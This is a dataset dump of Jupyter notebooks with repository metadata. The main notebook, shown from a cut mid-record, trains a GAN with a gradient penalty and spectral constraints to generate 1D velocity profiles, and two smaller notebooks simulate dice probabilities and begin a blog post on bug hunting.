torch.rfft(u,1,onesided=False)/n\n spec = 0.5 * (uh[:,:,0]**2+uh[:,:,1]**2)\n k = 2.0 * np.pi / lx\n wave_numbers = k*np.arange(0,n)\n spec[:,int(n/2+1):] = 0\n\n if smooth == True:\n spec = torch.reshape(spec,(u.shape[0],1,n))\n window = torch.ones(1,1,5).to(device) / 5\n specsmooth = nn.functional.conv1d(spec,window,padding=2)\n specsmooth[:,:,0:4] = spec[:,:,0:4]\n spec = torch.reshape(specsmooth,(u.shape[0],n))\n\n return wave_numbers, spec", "_____no_output_____" ], [ "k, E = spec(train_sigs.to(device),lx,True)\nE = torch.mean(E,dim=0)\nplt.xscale('log')\nplt.yscale('log')\nplt.plot(k,E.cpu().detach())", "_____no_output_____" ], [ "def stat_cosntraint5(x):\n k, Ex = spec(x,lx)\n return torch.norm(Ex-E)", "_____no_output_____" ], [ "stat_cosntraint5(fake)", "_____no_output_____" ], [ "uh = torch.rfft(torch.tensor(u),3,onesided=False)\ntkeh = 0.5 * (uh[:,:,:,:,0]**2+uh[:,:,:,:,1]**2)", "_____no_output_____" ], [ "def calc_gradient_penalty(netD, real_data, generated_data):\n # GP strength\n LAMBDA = 10\n\n b_size = real_data.size()[0]\n\n # Calculate interpolation\n alpha = torch.rand(b_size, nz, 128)\n alpha = alpha.expand_as(real_data)\n alpha = alpha.cuda()\n\n interpolated = alpha * real_data.data + (1 - alpha) * generated_data.data\n interpolated = torch.autograd.Variable(interpolated, requires_grad=True)\n interpolated = interpolated.cuda()\n\n # Calculate probability of interpolated examples\n prob_interpolated = netD(interpolated)\n\n # Calculate gradients of probabilities with respect to examples\n gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=interpolated,\n grad_outputs=torch.ones(prob_interpolated.size()).cuda(),\n create_graph=True, retain_graph=True)[0]\n\n # Gradients have shape (batch_size, num_channels, img_width, img_height),\n # so flatten to easily take norm per example in batch\n gradients = gradients.view(b_size, -1)\n\n # Derivatives of the gradient close to 0 can cause problems because of\n # the square root, so manually calculate norm and add epsilon\n gradients_norm = torch.sqrt(torch.sum(gradients ** 2, dim=1) + 1e-12)\n\n # Return gradient penalty\n return LAMBDA * ((gradients_norm - 1) ** 2).mean()", "_____no_output_____" ], [ "# Training Loop\n\n# Lists to keep track of progress\nimg_list = []\nG_losses = []\nD_losses = []\nScore = []\niters = 0\nprint(\"Starting Training Loop...\")\n# For each epoch\nfor epoch in range(num_epochs):\n # For each batch in the dataloader\n for i, data in enumerate(dataloader, start=0):\n \n ############################\n # (1) Update D network: maximize log(D(x)) + log(1 - D(G(z)))\n ###########################\n ## Train with all-real batch\n netD.zero_grad()\n # Format batch\n real_cpu = data[0].to(device)\n b_size = real_cpu.size()\n # Forward pass real batch through D\n output = netD(real_cpu)\n # Calculate loss on all-real batch\n errD_real = criterion(output)\n D_x = errD_real.item()\n\n ## Train with all-fake batch\n # Generate batch of latent vectors\n noise = torch.randn(b_size[0], nz, 128, device=device)\n # Generate fake image batch with G\n fake = netG(noise,128)\n # Classify all fake batch with D\n output = netD(fake)\n # Calculate D's loss on the all-fake batch\n errD_fake = criterion(output)\n D_G_z1 = errD_fake.item()\n #calculate gradient penalty\n grad_penalty = calc_gradient_penalty(netD,real_cpu,fake)\n #grad_penalty = calc_gradient_penalty(netD,real_cpu,fake,class_real)\n # Add the gradients and penalty from the all-real and all-fake batches\n errD = -errD_real + errD_fake + grad_penalty\n errD.backward()\n # Update D\n optimizerD.step()\n\n ############################\n # (2) Update G network: maximize log(D(G(z)))\n ###########################\n if iters % ncritic == 0:\n netG.zero_grad()\n # Since we just updated D, perform another forward pass of all-fake batch through D\n noise = torch.randn(b_size[0], nz, 128, device=device)\n fake = netG(noise,128)\n output = netD(fake)\n # Calculate G's loss based on this output\n errG = -criterion(output) + stat_constraint4(fake,real_cpu) + 10*stat_cosntraint5(fake)\n # Calculate gradients for G\n errG.backward()\n D_G_z2 = errG.item()\n # Update G\n optimizerG.step()\n\n FID = score(real_cpu,fake)\n\n # Output training stats\n if i % 50 == 0:\n print('[%d/%d][%d/%d]\\tLoss_D: %.4f\\tLoss_G: %.4f\\tD(x): %.4f\\tD(G(z)): %.4f / %.4f \\t FID: %.4f'\n % (epoch, num_epochs, i, len(dataloader),\n errD.item(), errG.item(), D_x, D_G_z1, D_G_z2,FID))\n \n # Save Losses for plotting later\n G_losses.append(errG.item())\n D_losses.append(errD.item())\n Score.append(FID.item())\n iters += 1", "Starting Training Loop...\n[0/40][0/128]\tLoss_D: 9.9786\tLoss_G: 1.6009\tD(x): -0.0002\tD(G(z)): -0.0000 / 1.6009 \t FID: 6.1212\n[0/40][50/128]\tLoss_D: 8.6431\tLoss_G: 1.5536\tD(x): -0.0049\tD(G(z)): -0.0004 / 1.5536 \t FID: 5.9032\n[0/40][100/128]\tLoss_D: 3.4854\tLoss_G: 1.4953\tD(x): -0.0248\tD(G(z)): -0.0033 / 1.4953 \t FID: 5.6146\n[1/40][0/128]\tLoss_D: 0.7241\tLoss_G: 1.5667\tD(x): -0.0484\tD(G(z)): -0.0042 / 1.5667 \t FID: 5.7969\n[1/40][50/128]\tLoss_D: -0.0194\tLoss_G: 1.5520\tD(x): 0.0049\tD(G(z)): -0.0308 / 1.5520 \t FID: 5.2629\n[1/40][100/128]\tLoss_D: 0.0007\tLoss_G: 1.5270\tD(x): 0.0562\tD(G(z)): 0.0169 / 1.5270 \t FID: 5.0435\n[2/40][0/128]\tLoss_D: -0.0033\tLoss_G: 1.5706\tD(x): 0.0704\tD(G(z)): 0.0163 / 1.5706 \t FID: 5.1384\n[2/40][50/128]\tLoss_D: -0.0204\tLoss_G: 1.6086\tD(x): 0.0567\tD(G(z)): -0.0372 / 1.6086 \t FID: 4.7286\n[2/40][100/128]\tLoss_D: 0.0942\tLoss_G: 1.6262\tD(x): 0.1388\tD(G(z)): 0.0344 / 1.6262 \t FID: 4.7446\n[3/40][0/128]\tLoss_D: 0.0746\tLoss_G: 1.3920\tD(x): 0.1745\tD(G(z)): 0.0549 / 1.3920 \t FID: 4.1156\n[3/40][50/128]\tLoss_D: 0.3216\tLoss_G: 1.4250\tD(x): 0.1916\tD(G(z)): 0.0019 / 1.4250 \t FID: 3.6693\n[3/40][100/128]\tLoss_D: 0.4263\tLoss_G: 1.3742\tD(x): 0.2367\tD(G(z)): 0.0738 / 1.3742 \t FID: 3.1086\n[4/40][0/128]\tLoss_D: 0.6053\tLoss_G: 1.1507\tD(x): 0.2429\tD(G(z)): 0.0922 / 1.1507 \t FID: 2.2444\n[4/40][50/128]\tLoss_D: 0.6051\tLoss_G: 1.0808\tD(x): 0.3566\tD(G(z)): 0.1513 / 1.0808 \t FID: 1.3108\n[4/40][100/128]\tLoss_D: 0.6510\tLoss_G: 0.9687\tD(x): 0.3900\tD(G(z)): 0.1538 / 0.9687 \t FID: 1.2151\n[5/40][0/128]\tLoss_D: 0.4432\tLoss_G: 1.0073\tD(x): 0.3716\tD(G(z)): 0.1700 / 1.0073 \t FID: 1.1721\n[5/40][50/128]\tLoss_D: 1.4735\tLoss_G: 0.8815\tD(x): 0.3622\tD(G(z)): 0.1842 / 0.8815 \t FID: 0.8050\n[5/40][100/128]\tLoss_D: 0.9238\tLoss_G: 0.9435\tD(x): 0.3935\tD(G(z)): 0.2083 / 0.9435 \t FID: 0.8198\n[6/40][0/128]\tLoss_D: 1.1221\tLoss_G: 0.7395\tD(x): 0.3461\tD(G(z)): 0.1719 / 0.7395 \t FID: 0.6274\n[6/40][50/128]\tLoss_D: 0.8005\tLoss_G: 0.8168\tD(x): 0.3981\tD(G(z)): 0.2201 / 0.8168 \t FID: 0.5764\n[6/40][100/128]\tLoss_D: 0.8762\tLoss_G: 0.8213\tD(x): 0.3989\tD(G(z)): 0.1957 / 0.8213 \t FID: 0.4794\n[7/40][0/128]\tLoss_D: 1.0190\tLoss_G: 0.7536\tD(x): 0.4766\tD(G(z)): 0.2724 / 0.7536 \t FID: 0.4503\n[7/40][50/128]\tLoss_D: 0.5222\tLoss_G: 0.7774\tD(x): 0.4810\tD(G(z)): 0.2703 / 0.7774 \t FID: 0.4584\n[7/40][100/128]\tLoss_D: 0.3487\tLoss_G: 0.8194\tD(x): 0.5614\tD(G(z)): 0.2524 / 0.8194 \t FID: 0.6017\n[8/40][0/128]\tLoss_D: 0.1153\tLoss_G: 0.8014\tD(x): 0.5452\tD(G(z)): 0.2933 / 0.8014 \t FID: 0.4927\n[8/40][50/128]\tLoss_D: 0.0449\tLoss_G: 0.6338\tD(x): 0.5917\tD(G(z)): 0.3483 / 0.6338 \t FID: 0.5059\n[8/40][100/128]\tLoss_D: 0.1015\tLoss_G: 0.6537\tD(x): 0.6297\tD(G(z)): 0.3271 / 0.6537 \t FID: 0.4809\n[9/40][0/128]\tLoss_D: 0.1523\tLoss_G: 0.7114\tD(x): 0.6286\tD(G(z)): 0.3507 / 0.7114 \t FID: 0.5633\n[9/40][50/128]\tLoss_D: 0.0708\tLoss_G: 0.6489\tD(x): 0.7506\tD(G(z)): 0.4712 / 0.6489 \t FID: 0.4593\n[9/40][100/128]\tLoss_D: -0.0355\tLoss_G: 0.5998\tD(x): 0.7902\tD(G(z)): 0.5447 / 0.5998 \t FID: 0.5604\n[10/40][0/128]\tLoss_D: -0.0967\tLoss_G: 0.5312\tD(x): 0.8006\tD(G(z)): 0.5573 / 0.5312 \t FID: 0.4877\n[10/40][50/128]\tLoss_D: -0.0603\tLoss_G: 0.5791\tD(x): 0.8260\tD(G(z)): 0.5773 / 0.5791 \t FID: 0.4415\n[10/40][100/128]\tLoss_D: -0.1302\tLoss_G: 0.5084\tD(x): 0.8147\tD(G(z)): 0.5453 / 0.5084 \t FID: 0.4061\n[11/40][0/128]\tLoss_D: -0.2422\tLoss_G: 0.6101\tD(x): 0.9320\tD(G(z)): 0.5183 / 0.6101 \t FID: 0.4600\n[11/40][50/128]\tLoss_D: -0.2331\tLoss_G: 0.5419\tD(x): 0.9069\tD(G(z)): 0.6064 / 0.5419 \t FID: 0.4472\n[11/40][100/128]\tLoss_D: -0.2591\tLoss_G: 0.4023\tD(x): 0.8977\tD(G(z)): 0.5746 / 0.4023 \t FID: 0.3815\n[12/40][0/128]\tLoss_D: -0.2746\tLoss_G: 0.3862\tD(x): 1.0285\tD(G(z)): 0.6337 / 0.3862 \t FID: 0.4764\n[12/40][50/128]\tLoss_D: -0.3574\tLoss_G: 0.4552\tD(x): 1.0287\tD(G(z)): 0.6238 / 0.4552 \t FID: 0.4153\n[12/40][100/128]\tLoss_D: -0.3097\tLoss_G: 0.3914\tD(x): 1.0223\tD(G(z)): 0.6520 / 0.3914 \t FID: 0.4265\n[13/40][0/128]\tLoss_D: -0.3733\tLoss_G: 0.3664\tD(x): 1.0295\tD(G(z)): 0.6056 / 0.3664 \t FID: 0.3554\n[13/40][50/128]\tLoss_D: -0.3047\tLoss_G: 0.4480\tD(x): 1.0025\tD(G(z)): 0.6346 / 0.4480 \t FID: 0.3594\n[13/40][100/128]\tLoss_D: -0.4185\tLoss_G: 0.4438\tD(x): 1.1371\tD(G(z)): 0.6611 / 0.4438 \t FID: 0.4062\n[14/40][0/128]\tLoss_D: -0.2403\tLoss_G: 0.3337\tD(x): 1.0012\tD(G(z)): 0.7096 / 0.3337 \t FID: 0.3510\n[14/40][50/128]\tLoss_D: -0.3973\tLoss_G: 0.3705\tD(x): 1.0915\tD(G(z)): 0.6344 / 0.3705 \t FID: 0.3951\n[14/40][100/128]\tLoss_D: -0.3664\tLoss_G: 0.4086\tD(x): 1.1507\tD(G(z)): 0.7449 / 0.4086 \t FID: 0.3835\n[15/40][0/128]\tLoss_D: -0.3213\tLoss_G: 0.2880\tD(x): 1.0917\tD(G(z)): 0.7400 / 0.2880 \t FID: 0.3220\n[15/40][50/128]\tLoss_D: -0.4715\tLoss_G: 0.4758\tD(x): 1.2225\tD(G(z)): 0.7136 / 0.4758 \t FID: 0.3879\n[15/40][100/128]\tLoss_D: -0.3500\tLoss_G: 0.3982\tD(x): 1.0949\tD(G(z)): 0.6939 / 0.3982 \t FID: 0.3790\n[16/40][0/128]\tLoss_D: -0.2828\tLoss_G: 0.3937\tD(x): 1.1140\tD(G(z)): 0.7080 / 0.3937 \t FID: 0.3820\n[16/40][50/128]\tLoss_D: -0.3594\tLoss_G: 0.3269\tD(x): 1.1503\tD(G(z)): 0.7533 / 0.3269 \t FID: 0.3747\n[16/40][100/128]\tLoss_D: -0.3738\tLoss_G: 0.3470\tD(x): 1.1374\tD(G(z)): 0.7305 / 0.3470 \t FID: 0.3501\n[17/40][0/128]\tLoss_D: -0.2381\tLoss_G: 0.3870\tD(x): 1.1174\tD(G(z)): 0.7718 / 0.3870 \t FID: 0.3206\n[17/40][50/128]\tLoss_D: -0.4271\tLoss_G: 0.3572\tD(x): 1.1475\tD(G(z)): 0.6909 / 0.3572 \t FID: 0.3271\n[17/40][100/128]\tLoss_D: -0.3382\tLoss_G: 0.2700\tD(x): 1.1951\tD(G(z)): 0.8256 / 0.2700 \t FID: 0.3538\n[18/40][0/128]\tLoss_D: -0.2817\tLoss_G: 0.2456\tD(x): 1.1362\tD(G(z)): 0.8233 / 0.2456 \t FID: 0.4165\n[18/40][50/128]\tLoss_D: -0.3541\tLoss_G: 0.2961\tD(x): 1.2472\tD(G(z)): 0.8478 / 0.2961 \t FID: 0.3249\n[18/40][100/128]\tLoss_D: -0.3325\tLoss_G: 0.3214\tD(x): 1.1710\tD(G(z)): 0.7807 / 0.3214 \t FID: 0.3854\n[19/40][0/128]\tLoss_D: -0.3153\tLoss_G: 0.3444\tD(x): 1.1702\tD(G(z)): 0.8186 / 0.3444 \t FID: 0.3605\n[19/40][50/128]\tLoss_D: -0.3587\tLoss_G: 0.2783\tD(x): 1.1862\tD(G(z)): 0.7849 / 0.2783 \t FID: 0.3132\n[19/40][100/128]\tLoss_D: -0.4079\tLoss_G: 0.1898\tD(x): 1.2344\tD(G(z)): 0.7895 / 0.1898 \t FID: 0.3365\n[20/40][0/128]\tLoss_D: -0.4054\tLoss_G: 0.2265\tD(x): 1.2273\tD(G(z)): 0.7953 / 0.2265 \t FID: 0.3789\n[20/40][50/128]\tLoss_D: -0.3293\tLoss_G: 0.2546\tD(x): 1.2432\tD(G(z)): 0.8731 / 0.2546 \t FID: 0.3089\n[20/40][100/128]\tLoss_D: -0.3449\tLoss_G: 0.2628\tD(x): 1.1889\tD(G(z)): 0.7839 / 0.2628 \t FID: 0.3263\n[21/40][0/128]\tLoss_D: -0.4392\tLoss_G: 0.2488\tD(x): 1.2352\tD(G(z)): 0.7601 / 0.2488 \t FID: 0.3242\n[21/40][50/128]\tLoss_D: -0.3790\tLoss_G: 0.2132\tD(x): 1.2167\tD(G(z)): 0.8073 / 0.2132 \t FID: 0.2980\n[21/40][100/128]\tLoss_D: -0.3664\tLoss_G: 0.1449\tD(x): 1.2348\tD(G(z)): 0.8400 / 0.1449 \t FID: 0.3017\n[22/40][0/128]\tLoss_D: -0.3343\tLoss_G: 0.2877\tD(x): 1.1457\tD(G(z)): 0.7817 / 0.2877 \t FID: 0.3424\n[22/40][50/128]\tLoss_D: -0.3231\tLoss_G: 0.3253\tD(x): 1.2250\tD(G(z)): 0.8601 / 0.3253 \t FID: 0.3276\n[22/40][100/128]\tLoss_D: -0.4138\tLoss_G: 0.2920\tD(x): 1.2569\tD(G(z)): 0.8078 / 0.2920 \t FID: 0.3085\n[23/40][0/128]\tLoss_D: -0.3617\tLoss_G: 0.1707\tD(x): 1.2202\tD(G(z)): 0.8323 / 0.1707 \t FID: 0.3111\n[23/40][50/128]\tLoss_D: -0.3485\tLoss_G: 0.3286\tD(x): 1.2656\tD(G(z)): 0.8886 / 0.3286 \t FID: 0.3264\n[23/40][100/128]\tLoss_D: -0.4028\tLoss_G: 0.3426\tD(x): 1.1970\tD(G(z)): 0.7672 / 0.3426 \t FID: 0.3034\n[24/40][0/128]\tLoss_D: -0.3470\tLoss_G: 0.2099\tD(x): 1.1932\tD(G(z)): 0.8190 / 0.2099 \t FID: 0.3068\n[24/40][50/128]\tLoss_D: -0.4301\tLoss_G: 0.2193\tD(x): 1.2872\tD(G(z)): 0.8259 / 0.2193 \t FID: 0.3212\n[24/40][100/128]\tLoss_D: -0.3975\tLoss_G: 0.3110\tD(x): 1.2402\tD(G(z)): 0.8225 / 0.3110 \t FID: 0.3387\n[25/40][0/128]\tLoss_D: -0.4245\tLoss_G: 0.2177\tD(x): 1.2898\tD(G(z)): 0.8275 / 0.2177 \t FID: 0.3069\n[25/40][50/128]\tLoss_D: -0.3522\tLoss_G: 0.2345\tD(x): 1.2358\tD(G(z)): 0.8569 / 0.2345 \t FID: 0.3078\n[25/40][100/128]\tLoss_D: -0.4086\tLoss_G: 0.3019\tD(x): 1.2334\tD(G(z)): 0.7952 / 0.3019 \t FID: 0.3112\n[26/40][0/128]\tLoss_D: -0.3904\tLoss_G: 0.3969\tD(x): 1.2020\tD(G(z)): 0.7810 / 0.3969 \t FID: 0.3108\n[26/40][50/128]\tLoss_D: -0.4111\tLoss_G: 0.2443\tD(x): 1.2469\tD(G(z)): 0.8016 / 0.2443 \t FID: 0.3282\n[26/40][100/128]\tLoss_D: -0.2611\tLoss_G: 0.3328\tD(x): 1.1236\tD(G(z)): 0.8372 / 0.3328 \t FID: 0.3066\n[27/40][0/128]\tLoss_D: -0.3914\tLoss_G: 0.1809\tD(x): 1.2323\tD(G(z)): 0.8135 / 0.1809 \t FID: 0.3031\n[27/40][50/128]\tLoss_D: -0.3794\tLoss_G: 0.2126\tD(x): 1.2738\tD(G(z)): 0.8648 / 0.2126 \t FID: 0.3208\n[27/40][100/128]\tLoss_D: -0.3305\tLoss_G: 0.2578\tD(x): 1.2542\tD(G(z)): 0.8535 / 0.2578 \t FID: 0.2982\n[28/40][0/128]\tLoss_D: -0.4107\tLoss_G: 0.2669\tD(x): 1.2584\tD(G(z)): 0.8192 / 0.2669 \t FID: 0.2980\n[28/40][50/128]\tLoss_D: -0.3026\tLoss_G: 0.2515\tD(x): 1.1921\tD(G(z)): 0.8578 / 0.2515 \t FID: 0.3030\n[28/40][100/128]\tLoss_D: -0.4441\tLoss_G: 0.1938\tD(x): 1.2544\tD(G(z)): 0.7909 / 0.1938 \t FID: 0.2937\n[29/40][0/128]\tLoss_D: -0.3783\tLoss_G: 0.2872\tD(x): 1.1795\tD(G(z)): 0.7793 / 0.2872 \t FID: 0.3167\n[29/40][50/128]\tLoss_D: -0.3567\tLoss_G: 0.3442\tD(x): 1.1832\tD(G(z)): 0.7938 / 0.3442 \t FID: 0.3339\n[29/40][100/128]\tLoss_D: -0.3105\tLoss_G: 0.2682\tD(x): 1.2503\tD(G(z)): 0.9122 / 0.2682 \t FID: 0.3007\n[30/40][0/128]\tLoss_D: -0.3972\tLoss_G: 0.2933\tD(x): 1.1817\tD(G(z)): 0.7514 / 0.2933 \t FID: 0.3145\n[30/40][50/128]\tLoss_D: -0.2908\tLoss_G: 0.2981\tD(x): 1.1780\tD(G(z)): 0.8653 / 0.2981 \t FID: 0.3032\n[30/40][100/128]\tLoss_D: -0.3221\tLoss_G: 0.2399\tD(x): 1.1748\tD(G(z)): 0.8264 / 0.2399 \t FID: 0.3150\n[31/40][0/128]\tLoss_D: -0.3319\tLoss_G: 0.3256\tD(x): 1.1801\tD(G(z)): 0.8188 / 0.3256 \t FID: 0.3078\n[31/40][50/128]\tLoss_D: -0.3927\tLoss_G: 0.2671\tD(x): 1.2335\tD(G(z)): 0.8081 / 0.2671 \t FID: 0.2870\n[31/40][100/128]\tLoss_D: -0.3562\tLoss_G: 0.3183\tD(x): 1.1999\tD(G(z)): 0.8218 / 0.3183 \t FID: 0.3013\n[32/40][0/128]\tLoss_D: -0.3709\tLoss_G: 0.3335\tD(x): 1.1660\tD(G(z)): 0.7715 / 0.3335 \t FID: 0.3022\n[32/40][50/128]\tLoss_D: -0.3525\tLoss_G: 0.3520\tD(x): 1.1353\tD(G(z)): 0.7580 / 0.3520 \t FID: 0.3003\n[32/40][100/128]\tLoss_D: -0.4976\tLoss_G: 0.2441\tD(x): 1.2468\tD(G(z)): 0.7190 / 0.2441 \t FID: 0.2910\n[33/40][0/128]\tLoss_D: -0.3484\tLoss_G: 0.2995\tD(x): 1.1673\tD(G(z)): 0.7810 / 0.2995 \t FID: 0.2982\n[33/40][50/128]\tLoss_D: -0.3902\tLoss_G: 0.2780\tD(x): 1.1573\tD(G(z)): 0.7434 / 0.2780 \t FID: 0.2996\n[33/40][100/128]\tLoss_D: -0.3121\tLoss_G: 0.3379\tD(x): 1.1119\tD(G(z)): 0.7784 / 0.3379 \t FID: 0.3166\n[34/40][0/128]\tLoss_D: -0.4164\tLoss_G: 0.2748\tD(x): 1.2527\tD(G(z)): 0.8128 / 0.2748 \t FID: 0.3130\n[34/40][50/128]\tLoss_D: -0.3157\tLoss_G: 0.3652\tD(x): 1.0971\tD(G(z)): 0.7529 / 0.3652 \t FID: 0.3155\n[34/40][100/128]\tLoss_D: -0.3906\tLoss_G: 0.2942\tD(x): 1.2324\tD(G(z)): 0.8163 / 0.2942 \t FID: 0.3077\n[35/40][0/128]\tLoss_D: -0.3360\tLoss_G: 0.3278\tD(x): 1.1854\tD(G(z)): 0.8182 / 0.3278 \t FID: 0.3482\n[35/40][50/128]\tLoss_D: -0.2552\tLoss_G: 0.2907\tD(x): 1.1489\tD(G(z)): 0.8635 / 0.2907 \t FID: 0.2887\n[35/40][100/128]\tLoss_D: -0.4143\tLoss_G: 0.3390\tD(x): 1.1955\tD(G(z)): 0.7591 / 0.3390 \t FID: 0.3018\n[36/40][0/128]\tLoss_D: -0.3928\tLoss_G: 0.3734\tD(x): 1.1992\tD(G(z)): 0.7826 / 0.3734 \t FID: 0.3233\n[36/40][50/128]\tLoss_D: -0.3361\tLoss_G: 0.3454\tD(x): 1.1456\tD(G(z)): 0.7817 / 0.3454 \t FID: 0.3094\n[36/40][100/128]\tLoss_D: -0.3571\tLoss_G: 0.2888\tD(x): 1.1501\tD(G(z)): 0.7714 / 0.2888 \t FID: 0.2918\n[37/40][0/128]\tLoss_D: -0.3758\tLoss_G: 0.2855\tD(x): 1.1462\tD(G(z)): 0.7415 / 0.2855 \t FID: 0.3042\n[37/40][50/128]\tLoss_D: -0.4472\tLoss_G: 0.3748\tD(x): 1.2322\tD(G(z)): 0.7588 / 0.3748 \t FID: 0.2959\n[37/40][100/128]\tLoss_D: -0.3120\tLoss_G: 0.2750\tD(x): 1.1580\tD(G(z)): 0.8154 / 0.2750 \t FID: 0.3206\n[38/40][0/128]\tLoss_D: -0.4149\tLoss_G: 0.2868\tD(x): 1.2133\tD(G(z)): 0.7768 / 0.2868 \t FID: 0.3009\n[38/40][50/128]\tLoss_D: -0.3588\tLoss_G: 0.3843\tD(x): 1.1442\tD(G(z)): 0.7632 / 0.3843 \t FID: 0.3159\n[38/40][100/128]\tLoss_D: -0.4442\tLoss_G: 0.3222\tD(x): 1.1932\tD(G(z)): 0.7224 / 0.3222 \t FID: 0.3413\n[39/40][0/128]\tLoss_D: -0.4036\tLoss_G: 0.2769\tD(x): 1.1629\tD(G(z)): 0.7320 / 0.2769 \t FID: 0.3020\n[39/40][50/128]\tLoss_D: -0.3741\tLoss_G: 0.2689\tD(x): 1.1603\tD(G(z)): 0.7609 / 0.2689 \t FID: 0.3104\n[39/40][100/128]\tLoss_D: -0.4118\tLoss_G: 0.3319\tD(x): 1.2086\tD(G(z)): 0.7641 / 0.3319 \t FID: 0.3308\n" ], [ "plt.figure(figsize=(10,5))\nplt.title(\"Generator and Discriminator Loss During Training\")\nplt.plot(G_losses,label=\"G\")\nplt.plot(D_losses,label=\"D\")\nplt.xlabel(\"iterations\")\nplt.ylabel(\"Loss\")\nplt.legend()\nplt.show()", "_____no_output_____" ], [ "plt.figure(figsize=(10,5))\nplt.title(\"Frechet Inception Distance\")\nplt.plot(Score)\nplt.xlabel(\"iterations\")\nplt.ylabel(\"FID\")\nplt.show()", "_____no_output_____" ] ], [ [ "## Results", "_____no_output_____" ] ], [ [ "device = torch.device(\"cpu\")\nnetG.to(device)\nnetG.eval()\nnetG.requires_grad_(False)", "_____no_output_____" ], [ "num_examples_to_generate = 128*128\n#Generate u \nmanualSeed = random.randint(1, 10000) # use if you want new results\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)\nnoise = torch.randn(num_examples_to_generate,nz,128, device=device)\nu_gen = netG(noise,128)\nu_gen = u_gen.cpu().detach().numpy()", "_____no_output_____" ], [ "plt.ylabel('u (m/s')\nplt.xlabel('z (m)')\nz = lz*np.linspace(0,1,128)\nplt.plot(z,u_gen[np.random.randint(low=0,high=num_examples_to_generate),0,:],'r')", "_____no_output_____" ], [ "Ruu_gen = auto_cor(torch.tensor(u_gen[:,0,:]))\nplt.xlabel('z/lz')\nplt.ylabel('Ruu')\ndz = np.linspace(-1,1,255)\nplt.plot(dz,Ruu_gen,'r--')\nplt.plot(dz,Ruu)", "_____no_output_____" ], [ "wave_numbers, E_gen = spec(torch.tensor(u_gen),lx)\nE_gen = E_gen.mean(dim=0)\nplt.xscale('log')\nplt.yscale('log')\nplt.xlabel('k')\nplt.ylabel('E(k)')\nplt.plot(wave_numbers_gen,E_gen.detach(),'r--')\nplt.plot(wave_numbers,E.cpu().detach())", "_____no_output_____" ], [ "print(torch.mean(torch.tensor(u_gen)))\nprint(torch.std(torch.tensor(u_gen)))", "tensor(-0.0028)\ntensor(0.2065)\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code" ] ]
e730df1b5ce7228b31539a454ddb6aefdf0b5689
1,326
ipynb
Jupyter Notebook
notebooks/.ipynb_checkpoints/pandas-index-mismatch-checkpoint.ipynb
tsdaemon/tsdaemon.github.io
9b2777ed47eeff17cafbf8eae8b41a83852321c8
[ "MIT" ]
1
2018-08-01T15:54:59.000Z
2018-08-01T15:54:59.000Z
notebooks/.ipynb_checkpoints/pandas-index-mismatch-checkpoint.ipynb
tsdaemon/tsdaemon.github.io
9b2777ed47eeff17cafbf8eae8b41a83852321c8
[ "MIT" ]
null
null
null
notebooks/.ipynb_checkpoints/pandas-index-mismatch-checkpoint.ipynb
tsdaemon/tsdaemon.github.io
9b2777ed47eeff17cafbf8eae8b41a83852321c8
[ "MIT" ]
null
null
null
30.136364
385
0.63273
[ [ [ "*Thrill. Passion. Excitement. These are not the emotions you feel when you see a ticket with a bug report. You mark it as a boring task at the moment you read it and your procrastination obligingly provide you with a list of distractions you can use to avoid it.*\n\n*I used to feel like that. But soon I understood that each bug is a complex and unique story much more surprising than any crime novel. I never know how it ends, but what I know for sure, it will be interesting. Now hunting bugs is a sort of my own detective agency with murders, victims, alibis, and evidence. And the murderer is usually is my colleague (or even I am myself).* ", "_____no_output_____" ] ] ]
[ "markdown" ]
[ [ "markdown" ] ]
e730e9a7f15346718759db15fa3492d3f2b9c798
238,025
ipynb
Jupyter Notebook
code exercise/0. Probability.ipynb
datamonday/Dive-into-DL-Notes
0ea2d810c9506a3d4ffbb16daf9fe20b213975b7
[ "MIT" ]
1
2021-05-07T04:35:46.000Z
2021-05-07T04:35:46.000Z
code exercise/0. Probability.ipynb
datamonday/Dive-into-DL-Notes
0ea2d810c9506a3d4ffbb16daf9fe20b213975b7
[ "MIT" ]
null
null
null
code exercise/0. Probability.ipynb
datamonday/Dive-into-DL-Notes
0ea2d810c9506a3d4ffbb16daf9fe20b213975b7
[ "MIT" ]
null
null
null
1,101.967593
233,764
0.956072
[ [ [ "import torch\nimport random\nimport numpy as np\n\nfrom torch.distributions import multinomial", "_____no_output_____" ], [ "fair_probs = [1.0/6] * 6\nfair_probs", "_____no_output_____" ], [ "np.random.multinomial(1, fair_probs)", "_____no_output_____" ], [ "np.random.multinomial(10, fair_probs)", "_____no_output_____" ], [ "counts = np.random.multinomial(1000, fair_probs).astype(np.float32)\ncounts / 1000", "_____no_output_____" ], [ "import matplotlib.pyplot as plt\n\ncounts = np.random.multinomial(10, fair_probs, size=500)\ncum_counts = counts.astype(np.float32).cumsum(axis=0)\nestimates = cum_counts / cum_counts.sum(axis=1, keepdims=True)\n\nplt.figure(figsize=(6, 4.5), dpi=300)\nfor i in range(6):\n plt.plot(estimates[:, i],\n label=(\"P(die=\" + str(i + 1) + \")\"))\n \nplt.axhline(y=0.167, color='black', linestyle='dashed')\nplt.gca().set_xlabel('Groups of experiments')\nplt.gca().set_ylabel('Estimated probability')\nplt.legend();", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code" ] ]
e730eec23a5e0a76a212b978d1c98d1c59507de6
10,477
ipynb
Jupyter Notebook
DataPrepSimple.ipynb
DrMegavolt/kaggle_house_iowa
1c32d4853fbb9c8a77a85133114fee44287f27a4
[ "MIT" ]
null
null
null
DataPrepSimple.ipynb
DrMegavolt/kaggle_house_iowa
1c32d4853fbb9c8a77a85133114fee44287f27a4
[ "MIT" ]
null
null
null
DataPrepSimple.ipynb
DrMegavolt/kaggle_house_iowa
1c32d4853fbb9c8a77a85133114fee44287f27a4
[ "MIT" ]
null
null
null
27.716931
215
0.508829
